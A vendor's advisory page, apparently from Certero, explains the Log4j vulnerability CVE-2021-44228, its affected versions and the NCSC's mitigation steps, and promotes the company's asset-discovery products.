fbpx

Apache Log4j Vulnerability - What you need to know

On December 12th 2021 a vulnerability was identified in the Apache logging application – Log4j (v2.0 – 2.14). Please be aware that all Certero products whether provisioned on-premises or as SaaS, are not affected by this vulnerability. Certero can however, be used to rapidly identify systems that are.

 

What is the Apache Log4j Vulnerability?

Tracked as CVE-2021-44228 and classified as severe, this remote code execution (RCE) vulnerability allows an attacker to potentially gain access to systems via the Java logging library through the insertion of a malicious code string, which then allows them to do various malicious activities such as taking control, importing malware or harvesting data.

 

What is the Impact?

Log4j 2 is commonly used to log activity within applications and is included in Apache frameworks including:

  • Apache Struts2
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • Apache Swift

Due to its widespread use, a substantial amount of systems are affected. Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java.

Microsoft has stated that the bulk of attacks they have observed at this time have been ‘related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers’.

Version 1 of the Log4j library is no longer supported and is affected by multiple security vulnerabilities. Developers should migrate to the latest version of Log4j 2.

 

What can I do to mitigate the risk?

The UK National Cyber Security Centre has advised the following steps to mitigate the risk:

  • If you are using the Log4j 2 library as a dependency within an application you have developed, ensure you update to version 2.15.0 or later
  • If you are using an affected third-party application, ensure you keep the product updated to the latest version
  • The flaw can also be mitigated in previous releases (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath

 

How Certero can help – Visibility

Application vendors are releasing patches or workarounds for their products so please ensure you follow individual manufacturer information to mitigate against the vulnerability.

Certero can be used to identify installations of Log4j on Linux devices by creating a dynamic group. Certero is able to identify systems where Apache is installed which can then be further interrogated for instances of vulnerable versions of Log4J. For assistance, please contact Certero through the Customer Center.

 

Certero’s Commitment to Security

Security remains of paramount importance to Certero, as demonstrated by maintaining both ISO 27001 and Cyber Essentials Plus Certification for all Certero products and services. Certero’s commitment to creating best-of-breed, secure solutions is baked-in to our development philosophy of keeping all solution development in-house within Certero and freeing customers from the burden and risks of legacy technology.

For more information contact Certero today and for regular updates, follow Certero on LinkedIn.

Want to discuss your challenges?

Certero’s [software-as-a-service] Solution

Certero help organizations transform their outdated operations and technologies in days and weeks not years. All of Certero’s solutions can be delivered as SaaS with no loss of functionality. 

Certero Unified Platform
Learn more about Certero’s truly unique ‘unified’ platform.

Digital Transformation Edition
Transform in days and weeks, not months and years, start your journey now.

Verified Oracle LMS/GLAS Solution
Verified LMS (License Management Services), now GLAS (Global Licensing & Advisory Services) solution.

Cloud Management
Manage Visibility, Cost and Governance of your Cloud Resources 

Enterprise Standard Edition – ITAM / SAM for Wintel
Default solution to manage ITAM/SAM for a Wintel environment. 

Enterprise Premium Edition – ITAM / SAM for Wintel
All you need in one place to manage your ITAM/SAM for a Wintel & Citrix environment. 

Datacenter
Stand-a-lone or holistic solutions for IBM, SAP and Oracle.

Software License Compliance
One Stop Shop, products and services for any solution – all in one

Business Intelligence Solution
See how to turn DATA into INFORMATION then transform into KNOWLEDGE, all in a few clicks. 

IT Asset Visibility
Find out: What do I own? Where is it located? Who is using it?

ITSM & CMDB Integration 
Populating the CMDB with ‘Quality’ asset information is more critical than ever

SaaS Subscription Management
Discover, manage and optimize your SaaS investments.

Everything in One place, True Unification

IT Hardware, Software, SaaS and Cloud Asset Management products that can run ‘stand-a-lone’ or ‘holistically’ and optimally together as a single solution, no dependencies. True unification across all asset and platforms and all delivered as SaaS. All of Certero’s products have the best TTV (Time to Value) by some distance.

Certero for Enterprise ITAM
Networks, printers, routers, Wintel, Mac, Linux, zLinux, Unix, all virtualizations and much more….

Certero for Enterprise SAM
Focused on Wintel software vendors, including automated solutions for Microsoft, Adobe and much more…

Certero App Centre 
Enterprise ‘Application Portal’ for Self-Service application provisioning.

Certero for Mobile
Go beyond standard MDM and deliver full management and security for your mobile workforce.

Certero SRDB (Software Recognition)
Transform raw software inventory data into actionable intelligence about application usage and licensing.

Certero for Oracle 
Optimize your Oracle Database, Middleware and E-Business Suite applications.

Certero for IBM
Discover and manage all IBM software & entitlements across the network. Dual Inventory, ILMT and Certero.

Certero for SAP Applications
Managing and automating the analysis of complex SAP named user and engine licenses across your estate. 

Passworks
An intuitive self-service password reset solution that can reduce service desk calls by 30%. 

PowerStudio
PC Power Management solution. Save money and reduce your carbon footprint. 

Certero Channel Partner Program

Our Partner Program opens up Certero solutions to a global network of partners – enabling customers to work with the trusted solution and service providers that know them best.

Join the Partner Program
Information on tiers and ease of doing business.

Deal Registrations 
Submit your deal-registrations.

Launching the Program
Highest-rated major SAM vendor on Gartner Peer Insights, launch global Partner Program.

Gartner Peer Insights Customers’ Choice

Rated #1 for SAM Customer Satisfaction year after year, after year

Blog
For the latest in ITAM, SAM, Cloud and SaaS Asset Management

White Papers and eBooks 
Download the latest white papers and eBooks for key insights and guides.

News
Read the latest news from Certero and the industry.

Events and Webinars
Keep up to date with Certero’s latest webinars and events.

 

Videos
View our range of product videos, webinars and customer case studies. 

Data Sheets
Download our datasheets which highlight the key benefits and features of our world class products and services. 

Case Studies 
See how organization around the globe change they way they [Do IT].

We think [and do] IT Differently

We don’t believe in claiming to be something we’re not. We will not do mediocre, average, indifferent, or outdated. We are different and will do it differently.

About Us
Get to know us more

Our Story
See how our approach is different

Our Journey
A timeline of events

Our Vision, Mission and Purpose
Mission, Purpose and Values

Careers
Browse our current roles

Locations
Find our nearest location